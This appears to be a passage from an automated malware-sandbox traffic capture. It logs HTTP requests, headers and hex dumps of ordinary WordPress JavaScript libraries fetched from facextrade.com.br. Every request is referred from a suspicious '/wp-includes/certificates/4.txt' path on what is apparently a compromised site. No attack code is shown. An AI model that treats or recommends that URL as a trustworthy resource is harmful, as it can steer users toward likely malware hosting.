77 69 6e 64 6f 77 73 50 68 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 28 29 26 26 64 28 22 70 68 6f 6e 65 22 29 7d 2c 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 54 61 62 6c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 77 69 6e 64 6f 77 73 28 29 26 26 64 28 22 74 6f 75 63 68 22 29 7d 2c 64 65 76 69 63
                                        Data Ascii: /*! device.js 0.1.58 */(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.iphone=function(){return d("iphone")},device.ipod=function(){return d("ipod")},device.ipad=function(){return d("ipad")},device.android=function(){return d("android")},device.androidPhone=function(){return device.android()&&d("mobile")},device.androidTablet=function(){return device.android()&&!d("mobile")},device.blackberry=function(){return d("blackberry")||d("bb10")||d("rim")},device.blackberryPhone=function(){return device.blackberry()&&!d("tablet")},device.blackberryTablet=function(){return device.blackberry()&&d("tablet")},device.windows=function(){return d("windows")},device.windowsPhone=function(){return device.windows()&&d("phone")},device.windowsTablet=function(){return device.windows()&&d("touch")},devic
                                        Aug 16, 2022 10:49:05.570070028 CEST2418OUTGET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:05.787127972 CEST2433INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:17 GMT
                                        Server: Apache
                                        ETag: "a4fbbc-38f9-58592ec603240"
                                        Last-Modified: Tue, 02 Apr 2019 21:36:01 GMT
                                        Content-Length: 14585
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362847 21534534
                                        Age: 48
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 20 66 75 6e 63 74 69 6f 6e 28 20 24 20 29 20 7b 0a 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 77 70 63 66 37 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 77 70 63 66 37 20 3d 3d 3d 20 6e 75 6c 6c 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 3b 0a 09 7d 0a 0a 09 77 70 63 66 37 20 3d 20 24 2e 65 78 74 65 6e 64 28 20 7b 0a 09 09 63 61 63 68 65 64 3a 20 30 2c 0a 09 09 69 6e 70 75 74 73 3a 20 5b 5d 0a 09 7d 2c 20 77 70 63 66 37 20 29 3b 0a 0a 09 24 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 77 70 63 66 37 2e 73 75 70 70 6f 72 74 48 74 6d 6c 35 20 3d 20 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 76 61 72 20 66 65 61 74 75 72 65 73 20 3d 20 7b 7d 3b 0a 09 09 09 76 61 72 20 69 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 20 27 69 6e 70 75 74 27 20 29 3b 0a 0a 09 09 09 66 65 61 74 75 72 65 73 2e 70 6c 61 63 65 68 6f 6c 64 65 72 20 3d 20 27 70 6c 61 63 65 68 6f 6c 64 65 72 27 20 69 6e 20 69 6e 70 75 74 3b 0a 0a 09 09 09 76 61 72 20 69 6e 70 75 74 54 79 70 65 73 20 3d 20 5b 20 27 65 6d 61 69 6c 27 2c 20 27 75 72 6c 27 2c 20 27 74 65 6c 27 2c 20 27 6e 75 6d 62 65 72 27 2c 20 27 72 61 6e 67 65 27 2c 20 27 64 61 74 65 27 20 5d 3b 0a 0a 09 09 09 24 2e 65 61 63 68 28 20 69 6e 70 75 74 54 79 70 65 73 2c 20 66 75 6e 63 74 69 6f 6e 28 20 69 6e 64 65 78 2c 20 76 61 6c 75 65 20 29 20 7b 0a 09 09 09 09 69 6e 70 75 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 74 79 70 65 27 2c 20 76 61 6c 75 65 20 29 3b 0a 09 09 09 09 66 65 61 74 75 72 65 73 5b 20 76 61 6c 75 65 20 5d 20 3d 20 69 6e 70 75 74 2e 74 79 70 65 20 21 3d 3d 20 27 74 65 78 74 27 3b 0a 09 09 09 7d 20 29 3b 0a 0a 09 09 09 72 65 74 75 72 6e 20 66 65 61 74 75 72 65 73 3b 0a 09 09 7d 20 29 28 29 3b 0a 0a 09 09 24 28 20 27 64 69 76 2e 77 70 63 66 37 20 3e 20 66 6f 72 6d 27 20 29 2e 65 61 63 68 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 09 76 61 72 20 24 66 6f 72 6d 20 3d 20 24 28 20 74 68 69 73 20 29 3b 0a 09 09 09 77 70 63 66 37 2e 69 6e 69 74 46 6f 72 6d 28 20 24 66 6f 72 6d 20 29 3b 0a 0a 09 09 09 69 66 20 28 20 77 70 63 66 37 2e 63 61 63 68 65 64 20 29 20 7b 0a 09 09 09 09 77 70 63 66 37 2e 72 65 66 69 6c 6c 28 20 24 66 6f 72 6d 20 29 3b 0a 09 09 09 7d 0a 09 09 7d 20 29 3b 0a 09 7d 20 29 3b 0a 0a 09 77 70 63 66 37 2e 67 65 74 49 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 66 6f 72 6d 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 20 24 28 20 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 5f 77 70 63 66 37 22 5d 27 2c 20 66 6f 72 6d 20 29 2e 76 61 6c 28 29 2c 20 31 30 20 29 3b 0a 09 7d 3b 0a 0a 09 77 70 63 66 37 2e 69 6e 69 74 46 6f 72 6d 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 66 6f 72 6d 20 29 20 7b 0a 09 09 76 61 72 20 24 66 6f 72 6d 20 3d 20 24 28 20 66 6f 72 6d 20 29 3b 0a 0a 09 09 24 66 6f 72 6d 2e 73 75
                                        Data Ascii: ( function( $ ) {'use strict';if ( typeof wpcf7 === 'undefined' || wpcf7 === null ) {return;}wpcf7 = $.extend( {cached: 0,inputs: []}, wpcf7 );$( function() {wpcf7.supportHtml5 = ( function() {var features = {};var input = document.createElement( 'input' );features.placeholder = 'placeholder' in input;var inputTypes = [ 'email', 'url', 'tel', 'number', 'range', 'date' ];$.each( inputTypes, function( index, value ) {input.setAttribute( 'type', value );features[ value ] = input.type !== 'text';} );return features;} )();$( 'div.wpcf7 > form' ).each( function() {var $form = $( this );wpcf7.initForm( $form );if ( wpcf7.cached ) {wpcf7.refill( $form );}} );} );wpcf7.getId = function( form ) {return parseInt( $( 'input[name="_wpcf7"]', form ).val(), 10 );};wpcf7.initForm = function( form ) {var $form = $( form );$form.su
                                        Aug 16, 2022 10:49:05.791438103 CEST2447OUTGET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.003343105 CEST2455INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:18 GMT
                                        Server: Apache
                                        ETag: "a53a4f-4d31-58592d7651a40"
                                        Last-Modified: Tue, 02 Apr 2019 21:30:09 GMT
                                        Content-Length: 19761
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362848 21534538
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 76 61 72 20 43 68 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 73 29 7b 66 75 6e 63 74 69 6f 6e 20 76 28 61 2c 63 2c 62 29 7b 61 3d 41 28 28 61 2d 63 2e 67 72 61 70 68 4d 69 6e 29 2f 28 63 2e 73 74 65 70 73 2a 63 2e 73 74 65 70 56 61 6c 75 65 29 2c 31 2c 30 29 3b 72 65 74 75 72 6e 20 62 2a 63 2e 73 74 65 70 73 2a 61 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 63 2c 62 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 67 2b 3d 66 3b 76 61 72 20 6b 3d 61 2e 61 6e 69 6d 61 74 69 6f 6e 3f 41 28 64 28 67 29 2c 6e 75 6c 6c 2c 30 29 3a 31 3b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 71 2c 75 29 3b 61 2e 73 63 61 6c 65 4f 76 65 72 6c 61 79 3f 28 62 28 6b 29 2c 63 28 29 29 3a 28 63 28 29 2c 62 28 6b 29 29 3b 69 66 28 31 3e 3d 67 29 44 28 68 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 2e 6f 6e 41 6e 69 6d 61 74 69 6f 6e 43 6f 6d 70 6c 65 74 65 29 61 2e 6f 6e 41 6e 69 6d 61 74 69 6f 6e 43 6f 6d 70 6c 65 74 65 28 29 7d 76 61 72 20 66 3d 61 2e 61 6e 69 6d 61 74 69 6f 6e 3f 31 2f 41 28 61 2e 61 6e 69 6d 61 74 69 6f 6e 53 74 65 70 73 2c 4e 75 6d 62 65 72 2e 4d 41 58 5f 56 41 4c 55 45 2c 31 29 3a 31 2c 64 3d 42 5b 61 2e 61 6e 69 6d 61 74 69 6f 6e 45 61 73 69 6e 67 5d 2c 67 3d 61 2e 61 6e 69 6d 61 74 69 6f 6e 3f 30 3a 31 3b 22 66 75 6e 63 74 69 6f 6e 22 21 3d 3d 74 79 70 65 6f 66 20 63 26 26 28 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 44 28 68 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 2c 63 2c 62 2c 65 2c 68 2c 66 29 7b 76 61 72 20 64 3b 61 3d 0a 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 6c 6f 67 28 65 2d 68 29 2f 4d 61 74 68 2e 4c 4e 31 30 29 3b 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 68 2f 28 31 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 61 29 29 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 61 29 3b 65 3d 4d 61 74 68 2e 63 65 69 6c 28 65 2f 28 31 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 61 29 29 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 61 29 2d 68 3b 61 3d 4d 61 74 68 2e 70 6f 77 28 31 30 2c 61 29 3b 66 6f 72 28 64 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 65 2f 61 29 3b 64 3c 62 7c 7c 64 3e 63 3b 29 61 3d 64 3c 62 3f 61 2f 32 3a 32 2a 61 2c 64 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 65 2f 61 29 3b 63 3d 5b 5d 3b 7a 28 66 2c 63 2c 64 2c 68 2c 61 29 3b 72 65 74 75 72 6e 7b 73 74 65 70 73 3a 64 2c 73 74 65 70 56 61 6c 75 65 3a 61 2c 67 72 61 70 68 4d 69 6e 3a 68 2c 6c 61 62 65 6c 73 3a 63 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 63 2c 62 2c 65 2c 68 29 7b 69 66 28 61 29 66 6f 72 28 76 61 72 20 66 3d 31 3b 66 3c 62 2b 31 3b 66 2b 2b 29 63 2e 70 75 73 68 28 45 28 61 2c 7b 76 61 6c 75 65 3a 28 65 2b 68 2a 66 29 2e 74 6f 46 69 78 65 64 28 30 21 3d 68 25 31 3f 68 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 70 6c 69 74 28 22 2e 22 29 5b 31 5d 2e 6c 65 6e 67 74 68 3a 30 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 63 2c 62 29 7b 72 65 74 75 72 6e 21 69 73 4e 61 4e 28
                                        Data Ascii: var Chart=function(s){function v(a,c,b){a=A((a-c.graphMin)/(c.steps*c.stepValue),1,0);return b*c.steps*a}function x(a,c,b,e){function h(){g+=f;var k=a.animation?A(d(g),null,0):1;e.clearRect(0,0,q,u);a.scaleOverlay?(b(k),c()):(c(),b(k));if(1>=g)D(h);else if("function"==typeof a.onAnimationComplete)a.onAnimationComplete()}var f=a.animation?1/A(a.animationSteps,Number.MAX_VALUE,1):1,d=B[a.animationEasing],g=a.animation?0:1;"function"!==typeof c&&(c=function(){});D(h)}function C(a,c,b,e,h,f){var d;a=Math.floor(Math.log(e-h)/Math.LN10);h=Math.floor(h/(1*Math.pow(10,a)))*Math.pow(10,a);e=Math.ceil(e/(1*Math.pow(10,a)))*Math.pow(10,a)-h;a=Math.pow(10,a);for(d=Math.round(e/a);d<b||d>c;)a=d<b?a/2:2*a,d=Math.round(e/a);c=[];z(f,c,d,h,a);return{steps:d,stepValue:a,graphMin:h,labels:c}}function z(a,c,b,e,h){if(a)for(var f=1;f<b+1;f++)c.push(E(a,{value:(e+h*f).toFixed(0!=h%1?h.toString().split(".")[1].length:0)}))}function A(a,c,b){return!isNaN(
                                        Aug 16, 2022 10:49:06.007086039 CEST2476OUTGET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.219575882 CEST2480INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:18 GMT
                                        Server: Apache
                                        ETag: "a53568-b61-58592d4b67500"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:24 GMT
                                        Content-Length: 2913
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362849 21534540
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 66 6e 2e 73 75 70 65 72 66 69 73 68 3d 66 75 6e 63 74 69 6f 6e 28 66 29 7b 76 61 72 20 64 3d 61 2e 66 6e 2e 73 75 70 65 72 66 69 73 68 2c 65 3d 64 2e 63 2c 67 3d 61 28 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 27 2b 65 2e 61 72 72 6f 77 43 6c 61 73 73 2b 27 22 3e 20 26 23 31 38 37 3b 3c 2f 73 70 61 6e 3e 27 29 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 62 3d 61 28 74 68 69 73 29 2c 64 3d 6a 28 62 29 3b 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 63 2e 74 79 70 65 7c 7c 22 66 6f 63 75 73 69 6e 22 3d 3d 3d 63 2e 74 79 70 65 29 26 26 62 2e 63 68 69 6c 64 72 65 6e 28 22 61 22 29 2e 64 61 74 61 28 22 66 6f 6c 6c 6f 77 22 2c 21 30 29 3b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 64 2e 73 66 54 69 6d 65 72 29 3b 62 2e 73 68 6f 77 53 75 70 65 72 66 69 73 68 55 6c 28 29 2e 73 69 62 6c 69 6e 67 73 28 29 2e 68 69 64 65 53 75 70 65 72 66 69 73 68 55 6c 28 29 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 62 3d 61 28 74 68 69 73 29 2c 66 3d 6a 28 62 29 2c 65 3d 64 2e 6f 70 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 72 65 74 61 69 6e 50 61 74 68 3d 2d 31 3c 61 2e 69 6e 41 72 72 61 79 28 62 5b 30 5d 2c 65 2e 24 70 61 74 68 29 3b 62 2e 68 69 64 65 53 75 70 65 72 66 69 73 68 55 6c 28 29 3b 65 2e 24 70 61 74 68 2e 6c 65 6e 67 74 68 26 26 31 3e 62 2e 70 61 72 65 6e 74 73 28 22 6c 69 2e 22 2b 65 2e 68 6f 76 65 72 43 6c 61 73 73 29 2e 6c 65 6e 67 74 68 26 26 28 65 2e 6f 6e 49 64 6c 65 2e 63 61 6c 6c 28 29 2c 61 2e 70 72 6f 78 79 28 6b 2c 0a 65 2e 24 70 61 74 68 2c 63 29 28 29 29 7d 3b 22 6d 6f 75 73 65 6c 65 61 76 65 22 21 3d 3d 63 2e 74 79 70 65 26 26 22 66 6f 63 75 73 6f 75 74 22 21 3d 3d 63 2e 74 79 70 65 3f 67 28 29 3a 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 66 2e 73 66 54 69 6d 65 72 29 2c 66 2e 73 66 54 69 6d 65 72 3d 73 65 74 54 69 6d 65 6f 75 74 28 67 2c 65 2e 64 65 6c 61 79 29 29 3b 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 3d 3d 3d 63 2e 74 79 70 65 7c 7c 22 66 6f 63 75 73 6f 75 74 22 3d 3d 3d 63 2e 74 79 70 65 29 26 26 62 2e 63 68 69 6c 64 72 65 6e 28 22 61 22 29 2e 64 61 74 61 28 22 66 6f 6c 6c 6f 77 22 2c 21 31 29 7d 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 2e 68 61 73 43 6c 61 73 73 28 65 2e 6d 65 6e 75 43 6c 61 73 73 29 26 26 61 2e 65 72 72 6f 72 28 22 53 75 70 65 72 66 69 73 68 20 72 65 71 75 69 72 65 73 20 79 6f 75 20 74 6f 20 75 70 64 61 74 65 20 74 6f 20 61 20 76 65 72 73 69 6f 6e 20 6f 66 20 68 6f 76 65 72 49 6e 74 65 6e 74 20 74 68 61 74 20 73 75 70 70 6f 72 74 73 20 65 76 65 6e 74 2d 64 65 6c 65 67 61 74 69 6f 6e 2c 20 73 75 63 68 20 61 73 20 74 68 69 73 20 6f 6e 65 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 6f 65 6c 64 62 69 72 63 68 2f 6f 6e 48 6f 76 65 72 49 6e 74 65 6e 74 22 29 3b 63 3d 63 2e 63 6c 6f 73 65 73 74 28 22 2e 22 2b 65 2e 6d 65 6e 75 43 6c 61 73 73 29 5b 30 5d 3b 64 2e 6f 70 3d 64 2e 6f 5b 63 2e 73 65 72 69 61 6c 5d 3b 72 65 74 75 72 6e 20 63 7d 2c 6d
                                        Data Ascii: (function(a){a.fn.superfish=function(f){var d=a.fn.superfish,e=d.c,g=a('<span class="'+e.arrowClass+'"> &#187;</span>'),k=function(c){var b=a(this),d=j(b);("mouseenter"===c.type||"focusin"===c.type)&&b.children("a").data("follow",!0);clearTimeout(d.sfTimer);b.showSuperfishUl().siblings().hideSuperfishUl()},l=function(c){var b=a(this),f=j(b),e=d.op,g=function(){e.retainPath=-1<a.inArray(b[0],e.$path);b.hideSuperfishUl();e.$path.length&&1>b.parents("li."+e.hoverClass).length&&(e.onIdle.call(),a.proxy(k,e.$path,c)())};"mouseleave"!==c.type&&"focusout"!==c.type?g():(clearTimeout(f.sfTimer),f.sfTimer=setTimeout(g,e.delay));("mouseleave"===c.type||"focusout"===c.type)&&b.children("a").data("follow",!1)},j=function(c){c.hasClass(e.menuClass)&&a.error("Superfish requires you to update to a version of hoverIntent that supports event-delegation, such as this one: https://github.com/joeldbirch/onHoverIntent");c=c.closest("."+e.menuClass)[0];d.op=d.o[c.serial];return c},m
                                        Aug 16, 2022 10:49:06.223092079 CEST2482OUTGET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.439268112 CEST2486INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:19 GMT
                                        Server: Apache
                                        ETag: "a53516-d453-58592d4a732c0"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:23 GMT
                                        Content-Length: 54355
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362850 18492608
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 0a 20 2a 20 6a 50 6c 61 79 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 70 6c 61 79 65 72 2e 6f 72 67 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 39 20 2d 20 32 30 31 34 20 48 61 70 70 79 77 6f 72 6d 20 4c 74 64 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0a 20 2a 0a 20 2a 20 41 75 74 68 6f 72 3a 20 4d 61 72 6b 20 4a 20 50 61 6e 61 67 68 69 73 74 6f 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 32 2e 36 2e 30 0a 20 2a 20 44 61 74 65 3a 20 32 6e 64 20 41 70 72 69 6c 20 32 30 31 34 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 62 2c 66 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 29 3a 62 2e 6a 51 75 65 72 79 3f 66 28 62 2e 6a 51 75 65 72 79 29 3a 66 28 62 2e 5a 65 70 74 6f 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 66 29 7b 62 2e 66 6e 2e 6a 50 6c 61 79 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 2c 64 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 65 3d 74 68 69 73 3b 61 3d 21 63 26 26 64 2e 6c 65 6e 67 74 68 3f 62 2e 65 78 74 65 6e 64 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 5b 21 30 2c 61 5d 2e 63 6f 6e 63 61 74 28 64 29 29 3a 61 3b 69 66 28 63 26 26 22 5f 22 3d 3d 3d 61 2e 63 68 61 72 41 74 28 30 29 29 72 65 74 75 72 6e 20 65 3b 63 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 62 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 50 6c 61 79 65 72 22 29 2c 68 3d 63 26 26 62 2e 69 73 46 75 6e 63 74 69 6f 6e 28 63 5b 61 5d 29 3f 63 5b 61 5d 2e 61 70 70 6c 79 28 63 2c 64 29 3a 63 3b 69 66 28 68 21 3d 3d 63 26 26 68 21 3d 3d 66 29 72 65 74 75 72 6e 20 65 3d 68 2c 21 31 7d 29 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 62 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 50 6c 61 79 65 72 22 29 3b 63 3f 63 2e 6f 70 74 69 6f 6e 28 61 7c 7c 0a 7b 7d 29 3a 62 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 50 6c 61 79 65 72 22 2c 6e 65 77 20 62 2e 6a 50 6c 61 79 65 72 28 61 2c 74 68 69 73 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 3b 62 2e 6a 50 6c 61 79 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 62 28 63 29 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 62 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 74 68 69 73 2e 6f 70 74 69
                                        Data Ascii: /* * jPlayer Plugin for jQuery JavaScript Library * http://www.jplayer.org * * Copyright (c) 2009 - 2014 Happyworm Ltd * Licensed under the MIT license. * http://opensource.org/licenses/MIT * * Author: Mark J Panaghiston * Version: 2.6.0 * Date: 2nd April 2014 */(function(b,f){"function"===typeof define&&define.amd?define(["jquery"],f):b.jQuery?f(b.jQuery):f(b.Zepto)})(this,function(b,f){b.fn.jPlayer=function(a){var c="string"===typeof a,d=Array.prototype.slice.call(arguments,1),e=this;a=!c&&d.length?b.extend.apply(null,[!0,a].concat(d)):a;if(c&&"_"===a.charAt(0))return e;c?this.each(function(){var c=b(this).data("jPlayer"),h=c&&b.isFunction(c[a])?c[a].apply(c,d):c;if(h!==c&&h!==f)return e=h,!1}):this.each(function(){var c=b(this).data("jPlayer");c?c.option(a||{}):b(this).data("jPlayer",new b.jPlayer(a,this))});return e};b.jPlayer=function(a,c){if(arguments.length){this.element=b(c);this.options=b.extend(!0,{},this.opti
                                        Aug 16, 2022 10:49:06.662741899 CEST2544OUTGET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:49:06.879462004 CEST2568INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:19 GMT
                                        Server: Apache
                                        ETag: "a534c0-228c-58592d497f080"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:22 GMT
                                        Content-Length: 8844
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 15362851 18492606
                                        Age: 47
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
